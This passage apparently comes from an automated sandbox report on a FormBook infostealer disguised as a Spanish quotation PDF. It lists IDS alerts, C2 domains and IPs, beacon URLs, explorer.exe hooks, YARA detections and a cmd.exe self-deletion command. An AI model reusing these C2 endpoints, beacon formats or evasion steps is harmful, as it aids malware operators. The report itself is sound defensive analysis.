                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x6c9000x4b.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x47ac.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x6a9540x6aa00False0.877765973036data7.76378455521IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rsrc0x6e0000x47ac0x4800False0.258192274306data4.85061345991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x740000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x6e1300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                RT_GROUP_ICON0x723580x14data
                RT_VERSION0x7236c0x254data
                RT_MANIFEST0x725c00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Version Infos

                DescriptionData
                Translation0x0000 0x04b0
                LegalCopyright
                Assembly Version0.0.0.0
                InternalNameOSVERSIONIN.exe
                FileVersion0.0.0.0
                ProductVersion0.0.0.0
                FileDescription
                OriginalFilenameOSVERSIONIN.exe

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                12/02/21-18:39:50.928609TCP1201ATTACK-RESPONSES 403 Forbidden8049833156.234.12.248192.168.2.3
                12/02/21-18:40:11.587934TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987280192.168.2.3192.0.78.24
                12/02/21-18:40:11.587934TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987280192.168.2.3192.0.78.24
                12/02/21-18:40:11.587934TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987280192.168.2.3192.0.78.24

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 18:39:27.587543964 CET4978580192.168.2.3162.214.233.244
                Dec 2, 2021 18:39:27.748866081 CET8049785162.214.233.244192.168.2.3
                Dec 2, 2021 18:39:27.749020100 CET4978580192.168.2.3162.214.233.244
                Dec 2, 2021 18:39:27.749593019 CET4978580192.168.2.3162.214.233.244
                Dec 2, 2021 18:39:27.910638094 CET8049785162.214.233.244192.168.2.3
                Dec 2, 2021 18:39:27.910689116 CET8049785162.214.233.244192.168.2.3
                Dec 2, 2021 18:39:27.910717010 CET8049785162.214.233.244192.168.2.3
                Dec 2, 2021 18:39:27.910948992 CET4978580192.168.2.3162.214.233.244
                Dec 2, 2021 18:39:27.911222935 CET4978580192.168.2.3162.214.233.244
                Dec 2, 2021 18:39:28.072073936 CET8049785162.214.233.244192.168.2.3
                Dec 2, 2021 18:39:50.447215080 CET4983380192.168.2.3156.234.12.248
                Dec 2, 2021 18:39:50.687839031 CET8049833156.234.12.248192.168.2.3
                Dec 2, 2021 18:39:50.687947035 CET4983380192.168.2.3156.234.12.248
                Dec 2, 2021 18:39:50.688074112 CET4983380192.168.2.3156.234.12.248
                Dec 2, 2021 18:39:50.928482056 CET8049833156.234.12.248192.168.2.3
                Dec 2, 2021 18:39:50.928608894 CET8049833156.234.12.248192.168.2.3
                Dec 2, 2021 18:39:50.928623915 CET8049833156.234.12.248192.168.2.3
                Dec 2, 2021 18:39:50.928740978 CET4983380192.168.2.3156.234.12.248
                Dec 2, 2021 18:39:50.928864956 CET4983380192.168.2.3156.234.12.248
                Dec 2, 2021 18:39:51.169332027 CET8049833156.234.12.248192.168.2.3
                Dec 2, 2021 18:40:11.571003914 CET4987280192.168.2.3192.0.78.24
                Dec 2, 2021 18:40:11.587675095 CET8049872192.0.78.24192.168.2.3
                Dec 2, 2021 18:40:11.587774992 CET4987280192.168.2.3192.0.78.24
                Dec 2, 2021 18:40:11.587934017 CET4987280192.168.2.3192.0.78.24
                Dec 2, 2021 18:40:11.604633093 CET8049872192.0.78.24192.168.2.3
                Dec 2, 2021 18:40:11.604665041 CET8049872192.0.78.24192.168.2.3
                Dec 2, 2021 18:40:11.604674101 CET8049872192.0.78.24192.168.2.3
                Dec 2, 2021 18:40:11.604862928 CET4987280192.168.2.3192.0.78.24
                Dec 2, 2021 18:40:11.604958057 CET4987280192.168.2.3192.0.78.24
                Dec 2, 2021 18:40:11.621573925 CET8049872192.0.78.24192.168.2.3

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 18:39:27.422539949 CET5213053192.168.2.38.8.8.8
                Dec 2, 2021 18:39:27.569787979 CET53521308.8.8.8192.168.2.3
                Dec 2, 2021 18:39:50.271529913 CET5510253192.168.2.38.8.8.8
                Dec 2, 2021 18:39:50.446052074 CET53551028.8.8.8192.168.2.3
                Dec 2, 2021 18:40:11.538088083 CET5623653192.168.2.38.8.8.8
                Dec 2, 2021 18:40:11.569740057 CET53562368.8.8.8192.168.2.3

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 2, 2021 18:39:27.422539949 CET192.168.2.38.8.8.80x8b16Standard query (0)www.weqffg.siteA (IP address)IN (0x0001)
                Dec 2, 2021 18:39:50.271529913 CET192.168.2.38.8.8.80x96ceStandard query (0)www.afxwn.icuA (IP address)IN (0x0001)
                Dec 2, 2021 18:40:11.538088083 CET192.168.2.38.8.8.80x50a3Standard query (0)www.analytics-at-scale.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 2, 2021 18:39:27.569787979 CET8.8.8.8192.168.2.30x8b16No error (0)www.weqffg.site162.214.233.244A (IP address)IN (0x0001)
                Dec 2, 2021 18:39:50.446052074 CET8.8.8.8192.168.2.30x96ceNo error (0)www.afxwn.icu156.234.12.248A (IP address)IN (0x0001)
                Dec 2, 2021 18:40:11.569740057 CET8.8.8.8192.168.2.30x50a3No error (0)www.analytics-at-scale.comanalytics-at-scale.comCNAME (Canonical name)IN (0x0001)
                Dec 2, 2021 18:40:11.569740057 CET8.8.8.8192.168.2.30x50a3No error (0)analytics-at-scale.com192.0.78.24A (IP address)IN (0x0001)
                Dec 2, 2021 18:40:11.569740057 CET8.8.8.8192.168.2.30x50a3No error (0)analytics-at-scale.com192.0.78.25A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • www.weqffg.site
                • www.afxwn.icu
                • www.analytics-at-scale.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.349785162.214.233.24480C:\Windows\explorer.exe
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 18:39:27.749593019 CET9660OUTGET /c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz HTTP/1.1
                Host: www.weqffg.site
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
                Dec 2, 2021 18:39:27.910689116 CET9770INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 02 Dec 2021 17:39:27 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.349833156.234.12.24880C:\Windows\explorer.exe
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 18:39:50.688074112 CET9884OUTGET /c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz HTTP/1.1
                Host: www.afxwn.icu
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
                Dec 2, 2021 18:39:50.928608894 CET9885INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 17:39:50 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.349872192.0.78.2480C:\Windows\explorer.exe
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 18:40:11.587934017 CET9976OUTGET /c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz HTTP/1.1
                Host: www.analytics-at-scale.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
                Dec 2, 2021 18:40:11.604665041 CET9976INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Thu, 02 Dec 2021 17:40:11 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz
                X-ac: 2.hhn _dfw
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Code Manipulations

                User Modules

                Hook Summary

                Function NameHook TypeActive in Processes
                PeekMessageAINLINEexplorer.exe
                PeekMessageWINLINEexplorer.exe
                GetMessageWINLINEexplorer.exe
                GetMessageAINLINEexplorer.exe

                Processes

                Process: explorer.exe, Module: user32.dll
                Function NameHook TypeNew Data
                PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE7
                PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE7

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: Solicitud urgente de Quotaion_U1197,pdf.exe PID: 6204 Parent PID: 5052

                General

                Start time:18:38:06
                Start date:02/12/2021
                Path:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
                Imagebase:0xf20000
                File size:456192 bytes
                MD5 hash:985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.300643719.0000000003301000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.300683350.000000000333D000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Analysis Process: Solicitud urgente de Quotaion_U1197,pdf.exe PID: 3560 Parent PID: 6204

                General

                Start time:18:38:08
                Start date:02/12/2021
                Path:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Imagebase:0x90000
                File size:456192 bytes
                MD5 hash:985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Analysis Process: Solicitud urgente de Quotaion_U1197,pdf.exe PID: 6120 Parent PID: 6204

                General

                Start time:18:38:09
                Start date:02/12/2021
                Path:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                Imagebase:0xd50000
                File size:456192 bytes
                MD5 hash:985DB7FDFCF2AA38A0B75C22F06B2756
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Analysis Process: explorer.exe PID: 3352 Parent PID: 6120

                General

                Start time:18:38:12
                Start date:02/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff720ea0000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                Analysis Process: msdt.exe PID: 6516 Parent PID: 3352

                General

                Start time:18:38:39
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\msdt.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\msdt.exe
                Imagebase:0xeb0000
                File size:1508352 bytes
                MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:moderate

                Analysis Process: cmd.exe PID: 6960 Parent PID: 6516

                General

                Start time:18:38:47
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
                Imagebase:0xd80000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: conhost.exe PID: 6020 Parent PID: 6960

                General

                Start time:18:38:48
                Start date:02/12/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7f20f0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >